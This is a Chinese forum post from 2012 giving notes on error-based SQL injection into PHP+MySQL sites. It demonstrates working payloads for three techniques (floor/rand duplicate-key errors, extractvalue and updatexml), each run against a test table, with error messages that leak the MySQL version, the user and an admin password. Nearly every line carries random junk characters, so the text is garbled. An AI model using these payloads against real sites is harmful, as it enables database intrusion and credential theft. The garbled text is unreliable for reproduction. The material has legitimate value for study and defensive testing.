放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。0 h t. L; y2 @8 w
实际测试环境:7 I: v! |- y* z9 F0 I, \- \' E
" ^0 }' N; E# F4 w0 G9 k # ?+ c) N+ v8 F( d* {" s
mysql> show tables;# L, A* H3 a7 |) T: T' O, O# i
+----------------+
% `; B1 u/ q! u9 I) l. i| Tables_in_test |
" U* Q1 i' N) ?+----------------+
3 ?5 Z/ a" E" u1 F7 E% ]1 p| admin |' ` p! b* a7 @) o# p2 T
| article |+ \, p- c7 K: v* r1 v, }
+----------------+
" ?& O& c# ~- r' s9 ^ 1 Y. A$ |; r8 Z" H
q+ T4 V/ Y3 P, c 3 \% T4 I: b" |$ J; ?' G8 `* C
mysql> describe admin;8 d- d, P0 R7 Z$ Y$ z3 o3 N# D2 H
+-------+------------------+------+-----+---------+----------------+
& G5 T2 V9 _( y9 Z6 m| Field | Type | Null | Key | Default | Extra |
) w' }4 ^7 J' i) A+-------+------------------+------+-----+---------+----------------+& b& }" T- h0 N. i
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |8 H# f7 u: x0 ]$ c$ y! k
| user | varchar(50) | NO | | NULL | |. }$ u( r1 z( c* \# E2 Z+ A0 u% ^, A
| pass | varchar(50) | NO | | NULL | |
, a8 ]" V1 a% y! i3 D+-------+------------------+------+-----+---------+----------------+* C2 g: g! O+ [- `2 [; {( j
( u8 R$ M9 H( M$ N+ `- J
5 R# q4 \# q$ R) }0 e
: K9 j- R& I! B5 y2 }1 m/ k- p" Rmysql> describe article;' [+ E7 y# ^+ p4 l T0 G
+---------+------------------+------+-----+---------+----------------+
# f, `- y B1 d) A- z| Field | Type | Null | Key | Default | Extra |' a/ r( ~2 Z- e# `+ b
+---------+------------------+------+-----+---------+----------------+
, P, k" Q1 S1 l/ h( ^% D| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
/ ] {7 _/ x4 E7 V/ w7 V4 J| title | varchar(50) | NO | | NULL | |3 O, ]& }" g& u$ i, W: z. B$ L* }
| content | varchar(50) | NO | | NULL | |
u7 B) ]/ S: n+---------+------------------+------+-----+---------+----------------+
% |. e; p$ }" P$ p1 ?# N1、通过floor报错! r+ i/ A( U5 S4 m' p: [# z8 H
可以通过如下一些利用代码
( s) b- }3 T6 b. D) a3 i
9 E3 m7 I- E N( ?9 ?
/ i+ F) e5 G; _" Sand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
( n+ W6 v: u r9 G$ a+ n, {% |from information_schema.tables group by x)a);" \+ k6 ^0 t! q1 f) Z9 {3 W
( n- F p3 I( D8 u# h ; Z& K8 ` J2 j; j
and (select count(*) from (select 1 union select null union select !1)x
9 S! v4 d: w* m8 ~group by concat((select table_name from information_schema.tables limit 1),$ f" }( Y8 [; p6 [7 G% \9 T
floor(rand(0)*2)));
* C5 f; z* s1 v: w- \! H5 V举例如下:
; T9 D0 c2 G& T3 u& n首先进行正常查询:" w5 i. S% D) H: x& [
5 v( K _* q) S9 _' p/ Mmysql> select * from article where id = 1;
, k2 E+ V* w: S" h' U: p/ K- A+----+-------+---------+
4 u4 |& l( d& k* ^2 j7 p| id | title | content |
# s' K- `& {* i+----+-------+---------+
' I' R% l: K7 c$ w: b| 1 | test | do it |
c, N* M; P( F: E7 E) l8 V+----+-------+---------+1 t. f" U7 k. P1 V" L( u. I
假如id输入存在注入的话,可以通过如下语句进行报错。/ q% u, @" ~$ R3 _) H- f8 f+ G
8 j8 K+ `1 [$ B$ [8 C, S) d" b
/ i9 z3 L0 E# J" g, N6 J6 v! D- a% J
mysql> select * from article where id = 1 and (select 1 from/ p, p# {: V8 r4 ?+ p. }$ r' E
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
/ Q' Q( f1 l% `& R# N' K2 j% lERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
" v( P' w; t3 M可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
1 ]) q. b$ w/ ~例如我们需要查询管理员用户名和密码:+ y) Y0 o& R7 k% V
Method1:
& A0 y1 k; V2 W) a
: n8 ?5 ^' `! s$ L/ @
! p' @4 s! a- L9 y3 Y4 Kmysql> select * from article where id = 1 and (select 1 from8 F" ^/ q6 p7 w( s% r7 N
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x7 A9 Y3 A- O- }3 t1 A+ D# l
from information_schema.tables group by x)a);
! ]) i' m! W) B/ B0 }( Z( KERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
0 @) N8 d( d! e( a D4 OMethod2:
- D8 f: q3 \8 x/ [ 9 I( H5 ]% ?! s
1 t: U8 V: ]* _5 V# e# N. g9 Hmysql> select * from article where id = 1 and (select count(*)
9 b) I) c# w* Q# V* {6 S9 N9 |from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),3 `$ V0 _) @/ n/ o6 d- |4 ]
floor(rand(0)*2)));
! U2 C0 P3 h2 C% `. w3 f/ YERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
7 O7 m; Q6 d K/ D! r6 z2、ExtractValue( L: L0 J% V+ v0 v5 Z# c
测试语句如下
& ?1 m Z) A; |4 D8 o
" i4 f R j( i! e3 y7 z & v+ L7 s/ y. N9 ]$ Y! n# c
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));, t% i ^2 V k6 K
实际测试过程
8 d; L* y# i l& i% L
+ I: n+ t! w1 {( F I- Z( z 5 B8 I" Q( c3 X" A1 [8 V
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,$ {7 z! E1 S5 p) X5 M! c
(select pass from admin limit 1)));--9 w: T0 q* t% a7 q9 `; a
ERROR 1105 (HY000): XPATH syntax error: '\admin888'" z2 t7 @6 q" |% t
3、UpdateXml
' k( k" ]9 N9 x7 ]2 T测试语句# ]; _5 F+ A3 B) _
. j* T5 n3 c3 w/ t4 f - J2 g" C9 A+ `4 I) f) V% G
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))" z8 D; H5 R' b" l* }' d* t! h3 Y
实际测试过程, e- q7 H& y; N* ^' }! ]
! h5 K, y, C$ |* `" n" H/ ^ H. I 7 W: n) F; x7 H+ l* y
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
3 K4 p' n+ [( _& `7 {9 T(select pass from admin limit 1),0x5e24),1));/ }% ^/ o7 L) I; O5 Q2 ]
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
7 ~9 S) p9 ]& h9 g: rAll, thanks foreign guys.
' h3 {6 l& n( L+ r: a8 x6 Y
( m; T7 |( J1 s- c {7 J' f3 c$ {% r" ]/ `! v( z: T2 c% {
|
发表于 2012-12-10 10:28:51
收藏
支持
反对